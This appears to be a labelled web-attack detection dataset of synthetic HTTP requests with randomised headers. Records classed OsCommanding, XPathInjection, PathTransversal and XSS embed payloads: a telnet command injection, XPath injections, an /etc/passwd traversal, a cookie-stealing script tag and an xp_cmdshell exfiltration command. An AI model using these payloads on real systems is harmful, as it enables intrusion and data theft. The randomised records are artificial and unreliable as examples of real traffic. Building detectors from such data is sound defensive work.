Pragma: 71h=sO
Proxy-Authorization: NTLM cmY4bG55dGl2YXJjb2ZtbWhpdGVhZTFBbWRhbnI5eWhJbXR0dGh0Z29hZWlzUw==
Authorization: aNtti hpho=sbL68
Range: -038647,3950-886928
Referer: http://www.cl1svRe2.com/9ieo8.php3
TE: trailers,chunked;q=0.7
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.2 (Machintosh; U; Mac OS X 2.2; 5t-ab; rv:4.9.2) Gecko/48804129
UA-CPU: Sparc
UA-Disp: 8616,110,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 8811x8791
Via: 6.3 www.truu7.png, 1.2 49.142.20.225:144, 4.3 217.223.66.154
Transfer-Encoding: compress
Upgrade: eto/0.2, rok/5.4, dgyt4O/7.3, hii8/8.4, hooeh/2.3
Warning: 988 144.42.79.118:49591 "sspeenqeLi3zyDee" "Thu, 16 Jun 05 19:34:26 GMT"
X-Serial-Number: 754321
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39982
Start - Id: 43099
class: OsCommanding
GET /unwosgmihia/Tlwjatcoc4oleoiH/r-7sPBdr4P/7V/pruHl/pR8/er0tnHgjnt2fv4o2ieE/t.5p/1Uj_3EVxA87a5C.llH/MMaYN_passwd5C.png?neo=%22+%3B+telnet+46.93.146.215++++80++%3B HTTP/1.1
Host: www.tubhctf.st
Connection: keep-alive
Accept: video/*;q=0.8, text/*;q=0.6, text/plain
Accept-Charset: *;q=0.1
Accept-Encoding: identity, deflate;q=0.1, identity
Accept-Language: iwbtu-bknetJa, medc-eEettf;q=0.4, l8s-oee
Cache-Control: max-stale
Client-ip: 160.22.241.142
Cookie: oey3efl9rrsN=201
Cookie2: $Version="127"
Date: Tue, 01 Jun 04 15:04:28 CET
ETag: "7fMIFPet.bIBWEJyH"
If-Modified-Since: Tue, 03 Feb 04 16:41:24 GMT
If-Unmodified-Since: Tue, 03 Feb 04 18:28:18 GMT
If-Match: "03M9dD5y5JmloZcTZw"
If-None-Match: *
If-Range: "HL4rjtEB9D0isHuw"
Max-Forwards: 274
MIME-Version: 1.3
Pragma: utogitrL=s
Proxy-Authorization: NTLM OXpyZ29vZW1ubnlmbzhlZXV1Y2tyaHN0ZGF4ODFuYmFhZHRr
Authorization: Basic ZWx3dG86cHVsc3U=
Referer: /tfhw/e111rrn/9yhl/ueehHSo/s4htazn.tar
TE: deflate
Trailer: If-Modified-Since
User-Agent: Mozilla/2.4 (Machintosh; U; PPC Mac OS X 2.3; i4-Si; rv:8.0.5) Gecko/15578556
UA-Disp: 418,932,32
UA-OS: Solaris
Via: HTTP/2.1 www.5sonfb.png, FTP/8.3 188.35.128.161
Transfer-Encoding: deflate
Upgrade: gowla/8.8, 8aooI/3.3, Tkiyol/1.8
Warning: 117 www.nI2s.jpeg "duaiiS2" 
X-Serial-Number: 306986025864028
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43099
Start - Id: 12848
class: Valid
GET /c1V-nHibX0ULg.f/im3KaOFML/winntlhvH-HzHmochaTIXqL/k8Zz9rYU-h.png?.Nfwp-xtermSbdy=eaL+2&stozo=quLhdi%3Bnoe&otjearttnrhmv=w%7Eepyni&d37p=nONvz1fj&mdcEn7Ntn=tIjfBFBo-R&ZAKT.eRpM=039364&siedethhiAc=059&orW50amochagD=pHBWPA&zgsHbkepvTirt=aqaph3OeNpzq&ceclwh1t7nudee=w4BvsG2RY&zHgBYinc=384974&ftsnlnebuYzm=hmouceic%5Dte&Esphre7ylor=nsmhg&pio=aihndhyiBosgic&dropdscriptnLjfh=2ene1 HTTP/1.0
Host: 244.165.121.198
Connection: ojdae
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 100.64.54.199
Cookie: nerOrpreg=x;xnull4kAS@BB9=eihce9ilA>;0niefvsYoog=oiv|0ltea1r7crh
Cookie2: $Version="875"
Date: Sat, 06 Oct 07 06:38:46 CET
ETag: "WU-5gxwcCX1t42G2qlC"
Expect: tbcewaEG
From: iirE@eyRmP2.biz
If-Modified-Since: Thu, 02 Mar 06 19:33:49 GMT
If-Unmodified-Since: Sun, 15 Aug 04 06:04:56 GMT
If-Match: *
If-None-Match: *
If-Range: "pUXiYpH3If.YPIoT"
Max-Forwards: 72
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Basic ZG5yVzphZGxldHk=
Authorization: Basic YXRpZzptb2Jhc3Q0
Range: 98709-37276,-196
Referer: http://www.UibAnrHy.gov/ret9/hni8hy/n28Nesr/rrtE/nvs0isel.php4
TE: deflate,chunked;q=0.6
Trailer: Host
User-Agent: Mozilla/5.3 (compatible; MSIE 4.7; Open BSD i386; srao; pnsn6onh; Esjnenpdor)
UA-CPU: Sparc
UA-Disp: 080,865,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 0320x5347
Via: FTP/1.1 www.Spissoi.gif, HTTP/8.6 132.236.131.185
Transfer-Encoding: compress
Upgrade: zoadt/1.0
Warning: 023 46.69.92.183:144 "hntstronN5s42o" 
X-Forwarded-For: 126.193.58.111
X-Serial-Number: 267270605384116
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12848
Start - Id: 35785
class: XPathInjection
GET /0j.mxePp@FteyUepzP.cgi?htnsnep3mg=mhstlt%27+++or+++++o%2Fitje%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D518%5D+++or+++++%27usls%27++++%3D++++%27&diuttyeeo1=aechoNea8&hrl7remlano=yW-tMuztipc&0o0uEnd=i49qa6&hp6obGa=jm6&nrxa=ash&eadbjpezecb3eei=ne4dmphiesgteAga83&ceaesbslmy=sG_&ssoCacAf=9&7dascAi4leA=slocationfmail&8bHi=493609310&peRake3=442268361&xt7aelz7kltfs=pu%3C&qokeQj4=fU0GOeh HTTP/1.0
Host: www.9l70yltd4.it
Connection: tetwa
Accept: audio/basic, text/plain, text/*
Accept-Charset: us-ascii, x-mac-chinesetrad, x-mac-japanese;q=0.4, x-mac-chinesetrad;q=0.4, windows-874
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 200.26.183.185
Cookie: thwfrBeFa=ovLpI;shtwliVge8ht=4;e5jsse=YeDeh;ageone9=rY5b
Cookie2: $Version="724"
Date: Sat, 21 Mar 09 23:10:56 GMT
ETag: W/"1x1qmvlx1fM-Jj8"
Expect: tz6uti0s=zmuahwp;imcC=ywma7
From: debl@hectstms.net
If-Modified-Since: Sun, 01 Jun 08 24:21:11 CET
If-Unmodified-Since: Sun, 25 Nov 07 19:13:50 CET
If-Match: *
If-None-Match: *
If-Range: "v_EoAoda01WKSsSF4QUh"
Max-Forwards: 3
MIME-Version: 5.9
Pragma: eh='hu5si'
Proxy-Authorization: Basic Z3Nwcjp5bVNvZWJqQQ==
Authorization: Digest username="TtgQNse"
Range: -777
Referer: http://Ojtari.ch/ehdfo/etNuoe/ejnrgh.mpeg
TE: trailers,deflate;q=0.8
Trailer: If-None-Match
User-Agent: buisraaas4smvifd
UA-CPU: x86
UA-Disp: 7633,886,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 072x540
Via: FTP/5.8 193.179.245.24, nx36i/1.2 www.d6o8es.js:80793, FTP/2.7 www.PiosDPl.js
Transfer-Encoding: heg6; 8l8iai=esas
Upgrade: homom/1.1, t6u/8.5, 6mrrds/0.2, yassta/4.9
Warning: 856 www.tesn.js "kvooddadai8neb" 
X-Forwarded-For: 142.75.180.148
X-Serial-Number: 9305784502
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35785
Start - Id: 36285
class: PathTransversal
GET /iL/eVelxLa4ke_/tdhJ/k6g4us43/nztjfi5ilS7eghtr7r/eGWq@z-z3ym@itVN/mnooppf8ebur0ii/itiee0eEbwghhn/0cr1i0lc5sdeEghia2E.asmx?6wRRg=17635&2ebjspfn4liazxr=l67M-UDT%40&hcqolEgebt=mr&J_Z4stdinfNT0Z=dobject%3Efsp8jeisT&yzy=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd HTTP/1.0
Host: 78.102.179.64
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: utf-7;q=0.6, koi8-r, iso-8859-8-i
Accept-Encoding: gzip
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 114.100.144.6
Cookie: gsdp=lvBO5RCIPS;input2xdiv=8440557;aeefytTidndpTr=NvOacceptsa
Cookie2: $Version="483"
Date: Tue, 16 Oct 07 23:46:13 GMT
ETag: W/"q6q.v8V-N2IS8LHrY7i"
Expect: 100-continue
From: 7sEpze@hrhiarN7.de
If-Modified-Since: Sat, 11 Mar 06 19:55:46 GMT
If-Unmodified-Since: Sun, 25 Jan 09 02:46:04 GMT
If-Match: "G7sTXJDGsxDFdWG7Lmv"
If-None-Match: *
If-Range: "FN7oSwfBJGN6lpcxuYI"
Max-Forwards: 6
MIME-Version: 5.5
Pragma: zle='lljur'
Proxy-Authorization: NTLM aXVmc2llbjJSZ2VvSGVlc2wwdW90N2FvYWV6ZXRyYWg=
Authorization: Digest uri=/ohyil/aroargkr/gi5s/ifatlbm/wsnitgp.asp
Range: 507970-,9199-
Referer: /medeh/twez/etn4/rstpc/Rnnl5Un.pdf
TE: trailers
Trailer: Accept-Encoding
User-Agent: hzl_A3WrNa http://www.blamiyub.ch
UA-CPU: StrongARM
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 1458x3720
Via: 1.2 199.98.214.149, HTTP/4.8 www.t0hs.jpg
Transfer-Encoding: identity
Upgrade: ye1nNS/5.5
Warning: 577 www.vkgsei.gif "nyhteteay" "Wed, 04 Jun 08 24:04:38 UTC"
X-Serial-Number: 3858869813582017
----: -----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 36285
Start - Id: 48185
class: XSS
POST /sh/slieihiytjbn7jhSIm/eXGAo/htpass___/ahaneiams/tsfm5kwGndVYoMs/d9Ux1CM.ATW.jpeg? HTTP/1.1
Content-Length: 108
Content-Language: vnmevnl,emihtSe
Content-Encoding: identity
Content-Location: http://www.iDgm.fr/ntdeagno/3sdinnLx/nt77rjoM/rtniI.mdb
Content-MD5: aHlINTJzNExvSGlhVHZhaA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 30 Aug 07 05:27:53 GMT
Last-Modified: Sun, 19 Nov 06 24:42:52 GMT
Host: www.otlIml.st:823
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: compress;q=0.7, identity;q=0.1, gzip
Accept-Language: <img   src    = "mocha:[document.location.replace  ('http://www.ieri.com/cgi-bin/at.cgi'+document.cookie);]  ">
Cache-Control: max-stale
Client-ip: 196.219.140.167
Cookie: tsty=h46ri;uebRi7lhdss=91572569;ydt15fl1uesc=424;ngday9stbene=7;AdN7WlJZechoQF=374
Cookie2: $Version="60"
Date: Sat, 18 Aug 07 21:15:58 GMT
ETag: "13Q28YBJBklXk8y"
Expect: alo9v=ts9oerrr;si8nlg=taofacfO
From: umnoGes@ienl6i3a.biz
If-Modified-Since: Sat, 08 Aug 09 08:45:59 UTC
If-Unmodified-Since: Tue, 20 Jan 09 17:01:09 GMT
If-Match: *
If-None-Match: "vcZ8ta0u0lgd05my"
If-Range: Sat, 14 Aug 04 19:22:01 UTC
Max-Forwards: 00
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: snef otwda=wezessn
Authorization: Digest realm
Range: -1170
Referer: http://www.2Bs9nse.net/aussh.jsp
TE: gzip,deflate;q=0.4,deflate;q=0.3
Trailer: Range
User-Agent: mXAqaw http://www.higR.fr
UA-CPU: Sparc
UA-Disp: 6418,097,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 615x877
Via: 4.0 www.6l6hiou.gif, 3.7 170.69.119.111, 7.9 12.24.134.127
Transfer-Encoding: eherne
Upgrade: srri/9.4, f3wl9/8.3, Feenos/9.2
Warning: 505 20.155.179.30 "pllnsh" "Sat, 12 Dec 09 10:14:04 GMT"
X-Forwarded-For: 142.177.244.22
X-Serial-Number: 2322173255
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

coyeglninaE=3915957&tst=eolmrlcss7ie(&uax16=jOO7lzquQ&Tx21BARhv@=li7iframeepd3a<a+&Eon1l44fofrovrC=354

End - Id: 48185
Start - Id: 34115
class: Valid
PUT /tPh9XBEvLpxZI8.V/mYWs23df/Qxrcp_x/6pibjoamowsueo/oe4eohcerhrin/25cmbr4usn5iwntotor/tmd6etoehys.aspx? HTTP/1.1
Content-Length: 44
Content-Language: nn,3e1mjw
Content-Encoding: identity
Content-Location: http://dsintrd.gov/eiisl/en6R/eidez.swf
Content-MD5: ck1wbmUyYjVlc3VjeWhUZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 07 Nov 05 19:24:11 GMT
Last-Modified: Thu, 10 Jun 04 22:30:17 GMT
Host: www.mmaT.de
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: x-mac-korean;q=0.7, iso-8859-7, utf-8
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 150.74.34.51
Cookie: oeiais=saAnf;lttme6amc=hd0qM
Cookie2: $Version="240"
Date: Sun, 21 Dec 08 15:15:59 CET
ETag: "-x.WPaEu0H@C67M"
Expect: etwta=fwts6;9czg=3esloi6c
From: 5hnawom@irsOeeii.ch
If-Modified-Since: Tue, 04 Dec 07 04:52:26 UTC
If-Unmodified-Since: Mon, 01 Dec 08 11:23:18 CET
If-Match: *
If-None-Match: "KxfPyg7x41An5gik"
If-Range: "SSU6ZQUt44QDY648_3"
Max-Forwards: 1883
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: NTLM aTV0b3NlRWFSdGFzbmxlbmlOaWRoZ3cyc3NhZWd3T3l0emVzdWFGdHpjbGE=
Authorization: NTLM cnRkZGFlbjVubW85Z2Jva3BsZUFXQWVpZHJpT1dmcmE=
Range: 49-,692325-1848,0-
Referer: http://www.e0cmfixh.net/nheeir/6s9xlxrL/tlkieC/sswt/iegrne5n.nsf
TE: deflate,trailers
Trailer: Pragma
User-Agent: Mozilla/0.3 (Windows; U; Win 9x 0.4; of-sH; rv:1.1.0) Gecko/86305583
UA-CPU: PowerPC
UA-Disp: 654,4575,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 7731x678
Via: HTTP/8.6 www.trainrgk.shtml, 5.8 191.133.16.22, FTP/9.4 125.225.201.22
Transfer-Encoding: identity
Upgrade: e1e/1.0, 4det/7.3, 8t7kr/3.5, cltiom/7.6
Warning: 657 www.eWibEanz.tiff "iaEat" "Mon, 06 Jul 09 07:37:50 GMT"
X-Forwarded-For: 37.174.184.200
X-Serial-Number: 18830507621799
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~

ntsieolwtm=Zn2rta83Eti&odehtoutt=3711&r1rr=7

End - Id: 34115
Start - Id: 49303
class: XPathInjection
GET /a1epwati/e-Q9.v5g2eNdYLge/pSfPYRO0B4kMZmXtm/sqyt5cnodY/cqtfoedahdbcIapo5a/ounctAinpaa/reaefyedaahjom/includecFbMvbscriptcor6.swf?ancmIasonI=ofsaa%27%5D+++%7C+P++++%7C+++++%2F%2Fuser%5B+++++name%2Ftext%28%29%3D%27Eo8iR&E1csobt=e8mail&qw4t6oeo=jnpthmithee5g5ehht HTTP/1.1
Host: www.et2fesbi.org
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, compress;q=0.3, gzip;q=0.9
Accept-Language: *
Cache-Control: max-age=0216
Client-ip: 249.173.49.26
Cookie: fhcU2smlrrkubai=7101;mescseaar5wi=gsncfri8i
Cookie2: $Version="05"
Date: Wed, 19 Nov 08 10:25:21 UTC
ETag: W/"5oOwunHRVio4Nk9"
Expect: 100-continue
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Fri, 30 Jul 04 24:56:24 CET
If-Unmodified-Since: Thu, 28 Jun 07 14:23:20 GMT
If-Match: "eZVfXv@bAQ9L_nCq"
If-None-Match: *
If-Range: Wed, 13 Jun 07 01:41:23 UTC
Max-Forwards: 1
MIME-Version: 9.1
Pragma: hihd8nu4='Eye'
Proxy-Authorization: NTLM YmVlaHJpZVNvNXlmamZwYW4xYWRydDdod3Noc3NsT3RrM280aWw=
Authorization: Basic ZVNFSlU6MDR0bGNl
Range: 762-
Referer: http://booetein.com/lxte.cgi
TE: chunked
Trailer: Date
User-Agent: e22SCd http://www.pwaorne.ch
UA-CPU: StrongARM
UA-Disp: 284,977,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7516x496
Via: 8.7 www.R8ag.htm
Transfer-Encoding: gzip
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 119 www.rMrCoeV.png "areeivlaiau9le2Crr" "Wed, 01 Jul 09 21:10:21 UTC"
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 15070707581939695
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49303
Start - Id: 36391
class: OsCommanding
GET /WiirsNdd6sssouhrtO/mhoTfonOob.gif?Ih5imgNfkhttp=r&eGff=3ln&E0C=350&ch=ojteo9RoRe&onsi04Bx=sncopy%24rereros&axDh06=456&XWUGF=mbpT%40&iueovet7ed=exj6hGst&lla=fs&aOqIhebHaaNe=yng%268bavrrcpisEmu HTTP/1.0
Host: www.1ho190hrf.gov
Connection: keep-alive
Accept-Charset: *
Accept-Language: aymat-ut, Co-rpRuo8;q=0.2, e-e9, an3a8h-Ehpne;q=0.6
Cache-Control: no-store
Date: Tue, 20 Jun 06 09:39:24 GMT
If-Modified-Since: Tue, 04 Jul 06 01:06:13 GMT
Max-Forwards: 46
Pragma: no-cache
Referer: /gecec5/dnrehebi.doc
User-Agent: exec xp_cmdshell   'bcp    "select   *  from    otlle"     queryout     pwdump.exe     -c  -Craw -Shackersip     -Usa    -Ph8ck3r'
Via: HTTP/6.7 www.loot.htm:3261, 4.1 www.sl6irelr.jpeg
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36391
Start - Id: 34332
class: Valid
POST /aW5dOKomZo9/drQLeGsMyW/svDhfbDjd/fxrxWnulf86/yL0aBr/tlZlG.TBG6fG37_..htm? HTTP/1.0
Content-Length: 272
Content-Language: snehbdc
Content-Encoding: deflate
Content-Location: http://www.osmtt.uk/grorf/6r8tqg/eon4/tune/0ahweays.cfm
Content-MD5: b2Zrb2RUbnRhcGVnZ2h1bw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 08 Dec 09 14:03:35 GMT
Last-Modified: Mon, 01 Mar 04 01:55:09 CET
Host: 89.138.206.77:36564
Connection: close
Accept: */*;q=0.6
Accept-Charset: hz-gb-2312;q=0.7, euc-tw;q=0.3, x-mac-chinesesimp, iso-8859-5
Accept-Encoding: compress, gzip;q=0.3
Accept-Language: alibrwL-rb0;q=0.4
Cache-Control: no-store
Client-ip: 116.18.167.222
Cookie: S6DubnWmD1=95094;eXice=093816848
Cookie2: $Version="8"
Date: Fri, 27 Jul 07 21:06:17 GMT
ETag: W/"GL@LsclmgUamZEDsv_"
Expect: 100-continue
From: 8Tmtnybi@toleu.gov
If-Modified-Since: Sun, 26 Sep 04 03:00:13 CET
If-Unmodified-Since: Fri, 06 May 05 20:02:22 UTC
If-Match: "rSar2JP0uH0-L_Ma"
If-None-Match: *
If-Range: Wed, 05 Aug 09 24:37:56 CET
Max-Forwards: 7
MIME-Version: 5.0
Pragma: muna='s'
Proxy-Authorization: NTLM aU9yd2hldW1uZ3RycnFtdUhqZUE0b3U5cmVzdGJyc3RhZTFnYWk1bnZveWVMbQ==
Authorization: NTLM dDBvaXV0aWVlYTNjYW5hQW16ZWFiZUdwYW9sZGVic2xtaGI3M2l6ZWF1
Range: -92864
Referer: http://iHignnni.ch/trOel3Nn/temrf/euGlurh.avi
TE: gzip;q=0.3,deflate,deflate;q=0.9
Trailer: Via
User-Agent: Mozilla/8.4 (Machintosh; U; Mac OS X 2.3; iO-rn; rv:9.1.6) Gecko/72792144
UA-CPU: Sparc
UA-Disp: 3186,9762,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9714x0556
Via: 3.1 48.196.153.63, 6.9 59.222.233.126, 1.8 173.143.52.61:7739
Transfer-Encoding: gzip
Upgrade: lOrae/2.3, unerfn/4.1, roft/4.9
Warning: 720 www.Aeesaq.jpg "emdinlt5scc" "Tue, 21 Sep 04 09:33:30 CET"
X-Forwarded-For: 143.200.9.7
X-Serial-Number: 57690312658
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~

nxztrmabbIotl=nph-t zhtacceswniwao systema  &sgvR=oezoereWy&3yfileiha=097&39NpnbritvnE=m&oet=tFZEw@&hrdhaeinsslref=@&XGCont=41512310&Wp7ku3Cetz3e=336&eAweptUuatTolw=nrtoClocationtt'eroE&5tazfe9l=325817198&eaieewa=un&ewdmsegagqknC=wfus&leaytaPzeDti8=2&6bnFeD=02770028

End - Id: 34332
